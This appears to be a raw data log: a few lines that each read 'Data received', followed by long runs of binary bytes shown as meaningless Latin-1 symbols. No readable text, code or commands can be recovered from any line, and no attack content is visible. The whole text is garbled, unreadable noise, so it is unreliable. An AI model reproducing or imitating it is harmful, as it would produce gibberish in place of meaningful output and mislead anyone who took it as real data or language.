Data received &û }ØÉþÓ¶àR? 6Ý{̙Lø&̬!³ÞCz2^‰ýP"6bŽÄ¡)ˆíÙ(¹ñ_wcèÆú÷»ÍI°R“ mº¨PV£U#¹\¤¼Á! òÐË¿Ùã"Ñæ)Ï$¡kßt…6ñX2êJå&}:·qþ"/ Æøs,G¿Ðª9Ü)XlFB×k;@ÅcÌ7Âjô›Ì r,¼QïBH | ‰…‚z>­­*v®|¶H±ëuLFñ†Z ‡Èõž?ŒY) ~$¿žÌßt™àä„Ú#%ê`ádGÉ^üÍÌÉ-ŠóÈoò+"(SBÁ‘ÚóySËÞ,_?m琢Bý„ÐÚ׳tÕ,ÎàŸ¿®W G[Æ"GϦÉ' ¸çŸµÜQޛYtó¬sY¤cZ”s.ƒP 2‘ú,{.ürj—+:yØ´žùLÕâP W“ Ý~˧²ôß ’ÕlŸÐ&ûD³%å)ù$4›ËØ?ÚÀÝ阆™1A`ÄÔ4üã2ÍçÓ´(ʗtéÚÒ$UbÆH¥]ÿ‰õL~5pÀvb k¥:>yaœI‘38pý5º³Z2¿­"™<¾/÷Ɍ%IòXI¹:­<~ֆYÕA!Ú&ÚºÁ”t ۆ;b~Õ²$¦Vb¢­¸Š"V» ¿‡Q9t((ÝÆÙ ˆUš|1-¨ï]ø úðT;f]N?_4Ž¾ÆF4yŸ0`2/»iЌç¯ G÷=ÎQuêV¿Ø! ß.¬ÓU¾eÀ®ÀžƒTنO·p™6ècs}ÕÀy‡­!’þ{† Юõä’íÌ 8رïh¾bÀB Þ)ÌN²–lINC˜Å´>vÅ(ÆÉ!œ™@F¯¡À®>«<ý%žÖá²í± l°´nSådO“ä¤äœ%[IžIø¹Ï(Íм \Þf…8ŸO´ßÏï=3 “º©ÔWðMG2M ꃦv”  é'¨ºuÆiG'ùüðª‹ê[ ŠE1oð¬ê¯IzÏöcìÜ7’ä)üÁÇ,Ô¹Ÿ¡˜ȹë÷XÊædwoÔF ^ùæY«ˆù’|(äê5Ä(¯î;½Ô—²™½[IsÆ*vâäÁzèÞ_ãö‡¶¡«Ÿûsk>z’»,`FûË㎻Y;ÎcP¨—ÀÛÏ Šg6Ö?Ê¾Ô ÖÂïܚGzge¶éE(m?Q3g¼LWÀý²<r»GĞvXÛ ÇjÓoˆÞBã·²™Ãs­T  [}Ì×Ãj1ô@]n.}Ut!/C«Yˆ’ ès:Ý· é=Bí¼Ðãâ„Åoêi™#ŠC&Ÿ3þ6Dk4\%Q0k–öERݺ …y2<ì‡Ñ4s¤Ã&sÝ];¤ar\Æ°¸ÏÙ|®=q¼RÛ Jœ·"×ü·€´ rÐjIS#«½È¶ý»£sš†ö³Ha܆ô诮;‡/yCy‰‘§K2ƒfƤ•†+[¢'eéa»{q``Ù_·Ú*ð>Z*® "£|õ‹¨ñ{d8ÞϾ¸È› ®1Ïיþjë+¸\œU9,IM\—Ô ƒó G™PÚÜÞºÿÍX6[~S†sø½¢({âýú'òBb¬I“¼h½T(ES†\åãè>©)Ùƒ|Öh÷bª„5ŸÍJ¶Ê åkŽÍdº)~ރ憮ùÓ8ó×ñÁÜwJ/ßÔóP;stœ5/Úë„œU¤@+N©l²K·Ö›ôΆ%f6ä•$F!À
Data received ×ùz©w´V* –Ë+¿:užñ¢¢L±‘ ö• ™Ñ€îY?/ü(8 çvÿ˜ðü$fÁH®Ð 1ÆŦ%[ºÛ$¼‡ÝY‚€ë‡™€µÃêþ€u™×ÅJˆ —·m'…™¼€±;„ãdyÈ«WI7™yŽzåSB­ŠÖÓð— Ꮾ‡>–«7 Mơ̈P$ù¦B*"Ðd“|²‡@ö?öxš¤g~7¹t—1eÕ`‘ÅŽæø/偿÷3î`•± ñ 8ÇæU{c‘Ua0…/¸-˜,VQæ3*3 wKj(±Ú “dN©zpdoûϙªÎ³"NY ŽÑüŽvhÞF98זq)Yü¾vPhÚ'…ô>OSÿ¤·3¥qÏÀwhA­U®È͗›-sžŸÔ*TþÕ´²èú*gny\<ï¿W¥ïQ…tˆ-íêKýˆ.ÅàibÐq'î/ÒT•Ìô ™U ô±‰@~ ÂM ïÏn!.dÊwí†à®ïÈà* £Ç¼ £\wkÅý(âÞNm60@†«zä*ic¸JÇq)ž¿ŒUÚóSë«é»ÕW` 7¼‚Ø#¥mT›(\(­Ÿìà—<ïxk0>ð~ìã΅ªÏéÆɋ”zÏÁªr6iê‡6Z² ŽOG“üûԚ cû<j… ià}x/ýÆì ó BG¤Ïu;œùˆÀq»®bP&8nÝ‘#ٚÅÎD°—rÓ3Ž^e4r˜ íõ%(k«1?«ìZ—Öí1‹…Éö™,­ªöÞùGÜm`®ºœ'¹¸ŽÁ:\ȕi ‹[æa­ II¢rŨèÝà½ÒåFû¾àm.ÏFŒ+uuøk-ZƒBxþÞÞÉ®NJ-ëlxØ)Åþ¤jFSûŦd…ËK+mÆ0J­4×n©éÝó‡Á‰œ¹<jü¾ÓùÑÊg} +4 W‘?ãÝbs~”dk¾ ?‹RÓ^EÈþM¸¢Ô±NË[-†&Æ· mj’É@w Î;×&6µ-Æ\-ÅJאkÂÈaq}¬V€HóÇ"3çÝ+wÀó“7Ê°³æj&Ê}×ÂGÛ¢{â¸âŒ¿GæmÑîÏð]HÛl'»p*€¯©Eäµâ¶[ñ!’®u8˜@GëóWäïËcUjR¸ô85QNaHl̺ë`Qí6ò£¹¤×,÷¥‰Ç9¥Ó PN·W±RòࠟÎG•Þ í:í6²tßçe•QÁ»E€& ¡ŽäޔD°ÐhXoàùO²À cÛd֖b–àeOv)ÿôd¶(2)ò]QÙ)G—\xáhX˜K$J•Sœº¨?ˆº¯ùkw £>Y×L*,ÁœõKh JE q’€ƒ ¼?€ôþ1ãPbãÕ՚1ªÉikßYÁ.JcjG”ÊE²*ƒðì¥Äh£ˆáü™ í"üô(§‹2¿8™%.yèêí€ô\Ç<cCfT|„EË_rx ¨wwÕãWCš´.›d”D¸Ñ-oSY}·ŸUzÙú –k÷îoûSʼnè•ÓJÉ0ëb?BÏRno‚&{ÈG†û‹a E¶þO<חԝN¾@¾lp”úX6_û¦)†¡Þ›A×[袙PS|Ù-eϕ|ۂ‚…Û0ê6!Èe›×-—Œ/×l …=ý_Àž³Ø û¬Öãؾ.íJ& ‹¸Lî:éqÀϗÜüļ’ËãltgÓoÎËDÖ噆>”ûö̝E}Å€‰…£Q7£0Œ8iÖuîR6&ٖ–aùÔ¢ïvF‰Ã'Öb·á]b˜K_êՊÿã2žnG©±Îa
Data received ‹ )àZk~Ž<¦R Šäô¿ÅÈÌIA¸Ɇ$*›-ñ,mÕ4ÔŠ}·{e•zH_ ÇÔfvϮĿGjÙ\|Tx] NõUîÓ9N‚ÏãLJšêÈr¬ €`À?BÕVތc^¡ZxOpšMÛu-O¡Z†á«p. ÉãÝÖN‘º( 豨]´Ja;™”{6*‰_ÜùËÒ¯DuØS{ÆÆ¿ŸÓUÖ©›Rq .?5¥dù[¸Žâšàr¨Sß×Å+jÝ³Þ÷Äæ™Ö7èíGS·ÑëZ À‚ã„SÊÏóæ…/0…X\ÄÏaþ9lÚiN»IöH©ltWæ†9t¨¬}í'ÄÅ5Wã&A°€üc#³T5·‚-wÃ678ÁУî¨Êe‡Pޟ£AÎ^aú D) c‚‰ØÂh8†¹;A덲íØÆôlÍÐiQ›âŸ:r¤M¦>HÙ®!#W®)›‘ÂC,óÒeŠ zÕKA<ÀPí0ŒEötŠWt*ÎËÈ$s¨°g™Ü^Uß`eöíuÛ©ð?ü=ä¡¢þO=+v²Jõ@߸´£«ÃõFŒ.0½1²µŠ@ÿ\C«7şŒì?“ã”|`¹kÄßÊj úÁ§yOµŒx«°°º”Ì{è’2 W|säæ¿=.uRæȈ‘E‘7ž¯Å`D¿»~_ÈøñÈIÉ÷tâˆûÊS$!º‚hùªÎœƒi;îFNW®ª„)`þÚxƒ~®yv’äa5ñI[¥Ÿg)ºYVÍB©ŒëÞOWt0vÃͧ¾½<H™&‚}Ù["ëfLé ๖ҍÏ60nìêÀN›?s7ôŖ Zóœôo¬fWä¡Br dQªµìÿ*èºf>æ´AD„{.¹‚°eª·`”w†ÄÀæÝÇÎDíRÚbç¨áŽkw$ûšæ‰_3 ô¥ý jÙ«²¼Ãyþ)%ŒÊGÑxPÖuȽ1lh(û£ã˜GˆÍ‘xÁ‘5;P—ª¤ëñ # 65(£Â{¸ÞKø{XD5')#‘Gd•`püJ íÝQ¼Ks營<†ƒe N‘èH‰?C^ ¸_ÒBäöÛrŸå&S³ aŽ'xT/cxAHúؤî{]ׄsÈ °k­Rƒ•, Àu›ÝÍ'íVÃÏèüLÄsnÀœ>‹p߉Et€÷Úx€«m캆£@qw†è5:0×71xфý;ð¬“g?®16JǞ…¦i‘q¤Ù½JzÄ–Ñ¥Ù®wˆÄéìO/xõfàu~lûîQËÐË䋀›_' ©Þ3êxÇ𠞒Xq†ÊÆ;ÂïË'‘õôžWDuMใYÜÿÆ˚ü¬vb»U†¾¼ªhì2¹*œ¿Kê³½YÃPuñÎA½ÄÇJ%G¡É+Ïî„àkS¼`K 9„·Ñ»)7 I¹Œé¼÷J©•ÞCú2"?C9F7CY¹a”²ØØæDå¯ ncö¸é€¦î<ËXüë½$a2ÌÒhٕš–ˆá¸'a]+ÀKp‘n|`¥åIؾ:Dª ^pâH.x"¨hRº9† Ю[¤þe||Y2þš Ú?¯¼@*™üÇ'¦9ýç ¹ƒ´}ȀÈÝûy½ „æj$]v“êàóð§,4.¼¤ßš0M=ÇxÍU²ÆÉøÇx;Ÿöñ{ûREÛސ74<"þ[¥+.$᳎Öu7;‡AÃ^ÆݼR+WÖEò
Data received æ«ßE°ÑX19K°H©±Z[ãøð:Vh+Ýw-ªHÒs§¹ÓÇ\ÏÈCÂs…ªnußSݻ羺 ÙÆÔ[Fa?›f€‹Z$Z4՚ea²˜‰ñ>5pSœ5XŸ¶7*æØîrE¼®O yÅâéq3f6.~ÄZö™ý¢ÄlT¶`xý¥3 êw˙iÊwGvΞ-VÙéo¼Ýð_Ÿ˜ Z|eƒ{©X²(’WÙEûÎÝè~K- š]xø(ïjÊԯ쇄懱e°eäXýTD²ŸêA\DŸ³4†.“¥Iý”®pþopÂ.-RgTžIšò¤6<’0]ø®„XÞ%ˆO[\9PÊå ô:ïéD8áùâuÜþ.‹vTq†6ðê)îêuwbB´LÌÉL‘DΘF(=;U)C¼>û8sÕ…pˆnàá÷V;*%†ËT¸£ôÐz$šžiß@vCR«wKlˇÏ÷Ìã‹zÏð¦sùnHØ=ה™žÏvìï±f"ð•G¾–òúøÛB¼RA—·vÍ°A[1<T ¼R4­iÔþŒe)Ç5և€å°Ž¥;œÉá’p:Ւ‹)隠su¸°êÆ-lŸÖg“ܤK·âPJ–è;%SJxþ9ä3ñ±5^*o\Ø#ë¡2ð£~ÁSô[´¢#±íWŽ“E˼˜mÁdÙ|B–Q»?²ÊPÃZ…>CÂ%Yz Ô Çá$qh}ìP„].º•nÈ©¼oNm‡ =9žMÞ`#Sõ}Aò‚eéÌOQ#I$øGê\9 (C½8éz5â@ÎMW}•œØ‡pŸ"ŒOZš¹%—£+|o‹T`C˜iS¨ç?ã¹n…ó«<ö›þ!‹`.Ê=ˆ#Å_ÊÚGŽj1sâ¯=|Q»O/}û ¾2œ÷ÈhXrëÉ3-†kߗɡtÕ â‘¬o½Õ_SE&ƒ>‚áU¯´áîN*Îýº"K¡)ÑnµHz½õ]*äÙäM cïÆxIÿ9bè Q±áՐïOÞú1Eî‰ ±6n:–C©Õ/5B¶é“'Š^ÌHe½WcÇN¯ ê6:¤­lñf҆Û(îÕÖÉR³žÎØøA˜´â<@*ŽhnNNnqý¼:ì@vm«3â ¡ó3Õùµ)2l)ÉR?'t‰¹ÖŽ ¯8a«nÌnÉåC””tS$!è)õ7%g{>aNoÒ¨•Ç˜ðZ:˜1!XçGI¦õmf—‘*.ÅóMG˜±¯QTIÖp,c ¼þ)ã·¨nÍÕ.Åê$ ƶKi©­Rž ‡â,ó²¸òçQÜó‚\´î«³­5ËëÐ:‡vRt‘5ß'ñ&vÓnMҚÝò ~/FD #aj:ß)($š·Ìw,9|Ådÿ²Ù<&´ •VÃqï…Þ/Úæ=|±Ýä n‚6Å¿äÃNÔl¢Ô\Kq/b]ò|ïú<kю‘Oymû)8~¶QŠVäTTM—¥»e 3\™:1W˵ðÄd” S ͕"’v=ñ%./‚<‰¢7C¬º]1GVÅMžP<ÏÙ½½ÂûWŒ'‚Sþ_,v>£Ú±^†ÃÖyêÜTÃõ8NÌÀEÙŸú¸-&å4œ}¸®Ûy­¤‡*‹bšV0¥—ŸoJÙA>žI?í¹ø:gÞ$¹I™ñ›Ž’Å¥mC‡ô¢©ª§€`ž»iâÖ©«oÖyëؔØRx·*€“–œŠxÇ$Ì8SÁöo¿ ‹ë÷N}ø½¾üužÕˆê÷¥q[7‰¢¶5³ábºsmq
Data received aÂ͒›†9¥O‰[–Œ©<µÂ¶êý.Œ&/bÕGÁop¦ñÀè©ZG.N@×sŒš=.?*óaűæsh‚W¢fÅ:"ÅQ霭û¤\‰wMOH9$= “–—Ã+ï}^ïYY“˜c}±žèkb\œßªóLQ .™ süã‚å…̍ìñÝ°Y¥šv´ ê\Þ;x,u/±T'ÎiX¦¼Ü…ÖN©‡¿ML±cÛÃÐq)— [S‹¥½¿<˜Äý‘Kýmó*w ÁŽð™ªC–0ñße·3ã¡˜°?÷Þé]*-By ^ÊOúõª±‹ )YþW¼m/çpI“Þ.FfÉFnET;[—<N×_žòÞÅ᤭‹ ·ÕC† …h^œíQ<!-§ª–ÕªðEGï3Ø/u¦cs7.cV@êdCƒÒHRR†§D¸ˆç%·É÷w£­Ñ'«DhE«€®Y´í¡Ðï§% Þn<w²¡-¬6Ëï¨i÷͹ënÙ&Ƴk¼¦Ý3®GéëÔkän{#¿R"ŸD)CçñÕ6âxÎÄVR€й>-֒÷±Ô•Î%»…ôApOùhöZ]”¡Åd`{DÝAD‚½ž+=Þv±q“ƒºº%R‘Ù¬ØGg6‘ (ܽØ0-±SŸ“¬ùä-@«|úOÈ -µ ¡„3þ•ø›é Î¦ª/ìÒ*ˆùF“Ѫ,Ñ•¶ÀܤþßgŒEQÙ’ndšœ3îr—F,aQÙüÄò—mô1½Ç­yªÑ DFY€Ål2¾÷ Û¦uj)až`¾Æ½@Wv6–uÞP†+ò¿“è6^äےžFÖ¯º¦Sœl,û“'×’þ‹™¢¨\á%?£Ma„S2è"Á˜ ¶ÃöH7óJY2‚WÏÁû]SÉÔ]ƒ&%¾ƒ¨»ø9^~¿u6ۗµRq¤Œ±}óˆK¯E€¦}¢Ä9D2T!pv8&‚ûjç<‹‰jÉ!¸š2©æ¬oM]Ìt Ž»Ém:ÅtOÑgg>a¿Ã…5]ž[šË¥ÎpZcìÅRD5„ʐ«5¡Ö؅œÐí„.æû YBŠX—~¶BlwƒÎFFù§§ØWR›ä€¥½÷3ô>©owàbõèQ±s"§ä8z£•J±{.Ù k t~Ձ—às¥0šTàØ©<k% `s­k&Ïl'qmNÒèÇÙJ²jÈöÕS—ZQÇñ芹æ G>Cbmñ»ycŒÒYrk6`×Äs¢í_•žï[©S^‹Â¸-Ÿ^•DSŸUÿ"=õš{ûÿþ¡â‚ ùÅî¤6¡…·ùŽ`\ I„¼ÂRJ%ÍבñGECïÀáp³z³àT0æè­*Çmô3+GßIý*}©\(»Ö'óž{ãÃ$`¿WØ3I7ZuN‚<÷Jxeux1%«¡ h7’È`¦?uÈöèª_â“Ñ·^Š‰+®cöú&–«¯g¶vÎY)_È^o´ ª.|à —#è€A%þh¶;]ŸK>Ïx¦µ@@U…&ÝD–·ù»ÉÆõLéæMOLi=?„ŠS];WÕ­Gc2í<5rË7)~ê”÷¢íFՁ±œí®©žÉÅê?æÿ¶îùÖå~΢8T³§ÊÏ´¼W{ÂæØäGR*[¯…¥×¢á¿k¿hŒ>ác™¸Q-ge (C4mõÉ §»Â~ZÝ.SÒ;³¿½=O'¿£±nðK›¨iÕQ $¡BSQXoox;…æ
Data received ¤®`¶ƒo£˜Ñ'_-ÿSP5c[s@Ï\Ý|\ó:7”Ñ3Bד ȸ´žý{’ˆ:/ƒ¯­¬ªƨÅ~\뽧*ëܤÌfSì¦cW¹ 9Š0\ÝÑWÚPùþ#ë&`́z :’þ1=»µ(} ôÆ|½Ë”K@7ŠCugE2eÉ74*¹s½à@¦ðÅĄ,‰Ô°ƒˆYMå}€JÜRœpƒÀϬ4õœÞmŽY9çz!! ÜpnâûӚ (i×ûªXÖEd%C}`°µ´ë¤ÝB„Þý]ˆ {l¥=͂§©ÖûŠõ±< Ä2}rÇ"š§È÷–›2 (u0˜m Ó(H^ þ»¿®èe-z·V#ÊRܯ?4hõÃÞÓ$,¬VC Ûè¹jI©êçV.ÎJÓ~‘-G6c;E0:Û×Á3]DR[«=“T]tô•1YÊD†· fÏÂ- ²yAêgÝTDQ_ú&kƒ €’2œÆÏób™nITʲ8·Ø¥=Ô\€]¿W,F®tK²Ó´@îC}-LvEZÜ0 ü[Ì9ç¤QŽoºøðÒ¾’§ë”Á*¯_|ªh^˜—‡jØmݸºbYð|ÇëÀj-o0ýfYò[¯Âš>bpÁJ#*ê§À²Bc¡UMžÕ©á[/ð6Ü?bƒt|"Èã‰<^ŸÊ¥-Àå3åðíÃ*ãr«9ñ^J à\¬mšIÒz¾id“" $¬–ôÙ¨%·Û2®ÏWˆò`òlÍ=š‰ÒÍÛà ý- 6¦8Ùí«ï̐»u_WËÔ‚ÂWfž®Œkâ†÷õ©ÂòGåaª] nø§Á{XژüKqTÑÝXTOÊ%F«Ž ;e$®ÉWYü‡7Dº¿wF\z.,—À"ë q m¢£º†Ã̐Žè¦µôÆn¨ ãJpFê戁úÅÄ ¼œ‰{”¡»’aÊRÚ8¦.ëR_§ãV%¤™§£™8IÁM&Žý««_Œ¸ î0Î Šy¿RøèÚAx\éH¬D ªÛiñþÑHtêx1rˆ3e ÿv9 ÎIF¢ªªG"·¬¶mPÊI’Ö?èjKg¬]{úï—O&á<±Pôþ¨ÜQ”2kØûpžøÌ{KŸï„µðùƒ’mì Ga±l’R‚‡±µ±Q@L€c3x»™u×ÚNýg=‘+v^åmSdvP<‰Õ¦!þɯ!OjßàZÖ+X;o“ŽDëÙLðŠb‡â0_ ]Â:<âlUƒÀ€KÇ- QyyY šÔÅgãɳä} ½`/ï•ÿu9ÔnÒʓp…©ª#%Y¥'1L„éúbEMî·ê¨Ã>Se@}B¢#Üür‚² dd ö cn>ԟ²EM4i^¹ ³6|×ÊE›újíP)d˜¢ªsê¯w©4öEÓoI\@TçËx©Eüx¬¼Sïþ½ZDn¨m_~ÓåòáHv÷ü±eã.eåå-4ÂÃeyŠ9纠4­|ÌBa—Ï.†âÝ®]ùк%0ò ¸8­A‚kŒ SqþS˜ê·Ûô®£+©jðã¨+§ WyYnÂytþWGwÿù„ÔY³r¤zBP<?a{¶X3‹ï‹Ä±¤‰$TUÀ%D×PºVÍùwõ5¢™°kwÖ,Þ뱐T+#­ÿ¡W‚(ñ1ç $º­FCø–°½%áŠ×:œs¸,zMŠ†S«¸þ÷·¢%ÀEipÙQõÜ&Œ¡JT¥XP—“5`  ÇbÙWÅ
Data received c¦T9P’ —–i¡·ª½UyÑ]‘Ó ߖ?¦½ÝKP7{Úd®o¨üIîâr@;Ê֜i Ü\n6h¤ë°%š4¢:û‘vnè³ñüúÛ´N"hº#Ÿ‹ºÚ8ږG\<uÐ×ha‚üM¯L*ԎWx±¢,ÁÜ> oÒ)”‚ìù&<X!žöo¥´_xõ ÐE¡Á.’>Ë3¥Î/Ù|¹¥CC‹«r]îùjÎLÍÈ°:õøƒ¾¨ÂDƪäÃ$øi*¶‡¾í2HüÈHº‰VTñy­¯eZØ_¦õc“s òº÷Î]œmiú7JSƒM£ó»Ü]mãªÉ#Oœ<8ê´ó•Ñ(ƒÃªüñvBÌÄÕVüAšIôf woü“þ§®è¸½3§.i4ÅÎNüù3ú¯–þ\‰Lq/8=Iv”ÎR„€øx‰Kp楆R'<{2¶¾~W¿F'*BX|ãtÙHA `‘¬”¦c¤v|ï ¹o¿ådb|œå-Ä÷³ÆM¯‰éMØ'“ç éä7½›kLõkÉðzÏöçJ&|taüãf$.{SÍeFÈü^šfÚcô%²˜ ¿p<ìr®¨]ŠŸbŽ i¦gÁ\øí©FÂõçZÃE á]]uö:Ä'ÈÍî~A3ŠLF=æ kéO'ßô×â Uû#¥´oXޚ)¾$ÑcÇÔ3ä“®ÊJX„БúLOê”ÌغKF €YáHüœ›zìoT_ ƒ‰gS¨„JJ+€v&\D§…5—ªç@õÆ>‚•.¢Ûã¡û±Ù€¡Ç•¹F:¥1úց¿›vFÓf‡ísGBBŒok3$á~àÔЕ&¾LÚkXŸWÜe‰ßrÿ9Ï #§Ñ7¬¡À·@½j›Dôᾨj<ºQÕiòíùXD¤|>Wºb4Žõ|é¤;ŽÇS•‚›¨!“»?zÁ?6»ýÊE_ˆ=¼¸.Nšc>±×B;y–M<¸n1U«i-<5¾ÀL9¢}…îÑz‚Ô ·§—¦Ø´%WZ­U8¿ù†…y›Ñeó”\ì[ÖÌGƛÙɕ2p·b,=¯kØdøîé?JHsî.ô.¡ ÛLËÓ¡¥¤h­qD7Ýìº:Îї7¯O½8mé`5ƒxz³ÓÔƏ—“¯Îäy‘çh¤>-ËQ`»/nÝC\ ® ÍÚ¼[(/Ta‚eÛ}ÕRœ%øáä_QÓ_ŒïþSñ"v†UX; vWe·7§w½äâí<ôݕ>ÕþÀ1ÁÅæûÀu˜z§ŒP™®œíŸãžà6×EÇ=}Δ̩+>ÇX„û§j×®e·5ÒnÚÙÃý‘8ìõ©þG.è7UâöÒdû8hܬš¬Øؓ4Ϙ=Ìߍ÷Íã M Púf¾ÐÜîrF!Ù3F‰†eVˆ  ‘-0š½ò9…$Y¢ ˆ¶X È^2pó :çï).8AãM¶‰¸¾´J˜À‹µ$åõhJvú£*»nkõKÀ. «ZD–¥4BS‘.RŽ§žÈƒÕ¢­?6¿fL-¦àh€“V×»cºPâßyý¯PèwæÄÍo™¥¶ö®)vÏ&ò_)uʧ¬ÓcÀC»²oã3¯ÇøáŘ+N`¦^—àT0Oru?*ã͚Z=<,Êý[‘6Ü®™«ÛAcv( .˜±ˆBb0s‡‹ú ¼5ûsù‡¶%²AÆ&3“ˆö †P¨(|g± v0k½£Ñš`h–@›9K҂ùg$Cº½µøWeÉ5hÛD7aÂ͟Ðe¶U Áü-‡
Data received ÿö6)@H¸FË%»ºÆò5¼·Y‹4èSMXÄí=Ò´9¼Òt„ˆ¼Ú•¨\ã:E…ê'¹j;Ž€íÂÍ}¡‚ŒµÂþ:@ë"°:>èû¾¥!›ZŒàâ8Å —[W™?¸6IV’ÑùHÛ¤wXî9¸Žœ>UÛ¡¸¾àY»¼Ñ¬Ø»à&ÐÉ–£ùw ãĀ=Š=.¢A˜dHnÊ"v4Þõ÷ÕP3ÒÚÓ\?˚™áZÌÇü…ô³AÓ§2æœNúŒžð5"ÏDFÕëï§5éÌ2æcêrŽÿ%òSnŽþ´å©Ø%TéVDñA¿žm­¾eÂ¥¾À3Á<W@ߊ‚¥7_`z˜ì^s„§¥èKÖðt±ªdJçKYQ3qM€žÌ'P!±¦sec„0ÊäT_?ó £ØgV¿[ ÉŠ~C݆oj¼ýúÏß|«ð8xŽñd\¥s`\Ubþ¢¯5 ítÇ;!¬•|tÑSÁ÷è( ¤/’µý9x#W/,SF'¥‹y3ÊÝSˆl€æFGHã ô]`Ü¡Z®×vˆ"&ê–ê•ö.Â+Ø IšS²ztdN–ó1‹—K©ú¡U¶i¶†Ñ» åÈ"§ê/ñò@ìýü4åË[ÑÆý~•ƒ‹*Ë2¤ëÚ Ÿ3Óèìä¯ÎšCTŠ¬½ä‹éæZbA¨vüMsPÎÿYÑȃ­¤˜±q`üKÃcÙ_;ìγÛYŸÙå²áLdõQdö[˜Ä²{ÄÉu¥¯â×}WG¿þ±¾ ~ӌù*±7ÝȈø³¡é[_¼¥¯ïœw`Fªv|b=Fz'øE9VØjF࢝Ó~{€Ë‘­Æ½]™ ýÊñý@‘²n)ç¡ez¤ï©M«F᳕KâVml÷q>ÖÎü&S®4zI5ÌÓ.3æªQç fZ²ŸãÀ¯zI.ò€?òÈ+ZžÍ5ÛѱïˆËU¹†äìòXö”Àb´kU )ú‹yCô´_ƱJ W©`ёô`%É\ÊÄò_g¶ŽxÁitçô®ßF \¨}ðæk®Œ"Ôt™Ûc/ì¥Ã4Ž¨UÐ.¥ãIÔ{‘c!ó6õӂeRŸù&&Òºq,8óáªé¢1zö3£o«€\m]Pq*ÅD_W™]š|q¹@OçÁ#»Æ£#7ºèò Z¬÷a˜µ×í`¡PdÖÜқEÝæZ©:ù>ÀiŸH®íP·N±o‚Պ.UÈW‡KBD9óiíb5"Vý±ï0֒ÃN´,¤ALá çü‚¶û)¶pµÉ,–Ö¦n¯òÊù3ټĭ³˜Ìo:íÕ£…3!Œð) & À•çÅAÙôû„Yd—Rn.ÃüÙû/iW6ȅIK-q…œ[o!n}P1¶hXÄÝ@™Kõ&åX`@ŸQŽ7vÿ*¸ZØE“©ª1BCh8N+—!÷ ãÏ]1U³b¯b“Vö]ŏ¤I¾ì=ý!®ZøAº§Ḯ £,Æ}ZÏ%t4MfåÙ/ñÌãCÄ%Èɟz¦=¢’f‡ô\ á ¢>^LPÒ/o„à3#+ú– ñ›Ö"SÅV+¥ïÒ­¬>£C<J‹Ò¥o@;QÛÝ΍Êû…"†4 ¶ôSÐt–ˆ„o™ÿEµ¯sêU©D2o o”§‚jžk¬¨^mÙÚpë„ÕøQy¾#ò„b«¹¾¯‰ÖJM×ÆÁ .Îgöš‰ajÖü%BØÓ úÞ ZKjƙ¶kÔË AÛ Ç7ÚÁ)§Š’,ʱɶ4Z
Data received VàÝó´sî|Œ‹YŠ3>…ÒEšü|™ÿ9¯7D¤wß´®ç‘WÞPwÅAaG—䦹_U ¦Ci÷Ž5–¹cŠ3›­sË(ŠA¯_™nêz­…êz—J°Ýîþ⭃|Ê©F¸¤é_6¸„qlꉔíû^t[͍ªÀ A_½}» Lû?e)/ºôïsÖ¿×üÒÌ«ÕÔð†·Ù8@y‚sð·™ñ/§äƒÄF»´ñõ÷jóö¸Ú±Õ¸•– ¹­™—6τMo¦±»´¤m@¿å)^¬¹×Ʉ)ßêi%#n¤c%žá˜©tV"¢P9u·¦bü*;+U{=Þâê[Qce¾ý»çŒý×T˜m·Ü‹Øà‹Ò›,Ç+.G~m{I¯çaöw@g;œÆ ñçk5 dÔÝVÊ!«uÚõ(ÌÕýXææ·¥΀úMMÈòï.º©Ì¶D¾½”ê…÷«ò–Ê: OÜxÍÍOçŠàœ ¹ÚlÙP¿ñÑ~ç¨Õ¦”v¨Ñ ¿Í§Gy0J…„Ê\“›ËÏ ;@þ>ãÓ&EP;ø"!Bæã*BÜéxވYÂ6 ÒI²Xèâ þôDf‹¨©!ðŠ gíçzÉ¥5Y㲐›Ks§£FŸÕɏ kž^3/‡G X“Ý¡A‰0jnúè<‰Êˆ†6>“«·ƒ»ø^+{DõOÉj»1 ™ò»¨µËN€"8&ÿŒ4*¨K®íYéÙvWÜïû»‘Ä>àEкF_F)„wv… ±õò„ð‹¾Ø>¸×Ò,uówÑ!ÑޏªÙ´œ0 F+œËSl„—“Mh-‹V‚ž¡ƒ^Ù ¨QPn‰oªc6šÐ~.ªA¦z´ŸxPÍôžh dÏ1KǼÖ}ßÿ„¹ÁÂ¾ œ¬:՘8‡•N¸åÜˤ/”‚i-º±ŸØj•ûæ®kÙL²s)[-´ > õ‹UÔåLt´Ž·?5€øÍCp {LXú²k@3¹ èÊcŠÀa¿ìå[¤ö;lgܦÀš¦gù†tƒæ{ò+ ú'Ã6\ƒè¥3ƒÄzò~Í_òÙ§>­êßßYñÿ‰ÁˆjµÞÅ"Ã.*mÀ€€Êæ>…F•„´ì ýàR¼›’Ò¡Šc®Xž›À¶©|3jØnRÏÒ» ;]VŽI#„Bâé³hÁ¬û­2Ê<mî#×µ’P¤ {`P¸"&êÇÁüÁÝ7WQß{ZÆýžÛ3*s+ç¦bSŸº“«u[S̖œ¨O^ß Aí®øþèvIfÓÌ[!ь˜™8 ‰à¦3Q2S‚òF“î=ÔyªìÍ»øÀÄi.ÐÁ<à$9ѧƒŒjB7Fÿ¹’ ¶ÂwÆûaî®5ô£²ËaÂs›¼óæ·ªuð õS0¬\Ûù`²†u'?nø¡½í¡õ´Ž .ÿ1ÎV‡çÆOYUÊCß^)ì’{TO¾~»ÀR£ì@¥Œ¿{¢´:…ºÆÖ`ºâg賓27%"J0ó] õHÙ‹ÝšsÖoã¡Ê‰ Yžl3¿ÿa‚ÒZWÜ*0ÕS̛"AD\Ÿ¥rw=€ZŽ¿ÙÏ$—› LÃûÚ-Yð¨/„ÍQhø‡Ê>Q¤´cx{snÅ}‘ƒs؏zJ/¹3ÇQÅÜ4´÷Ÿÿ%òä^ù´7õv»àâQ¨TƒÄ Nz zœI,]õ8¿Àå!ïFT?[BõÁ6 ~¼iõá:¡iîÈ÷ ŸùÎOÏuôN_R¶êדãö[Q?8+z{õäƒ+(R[âZ"š'
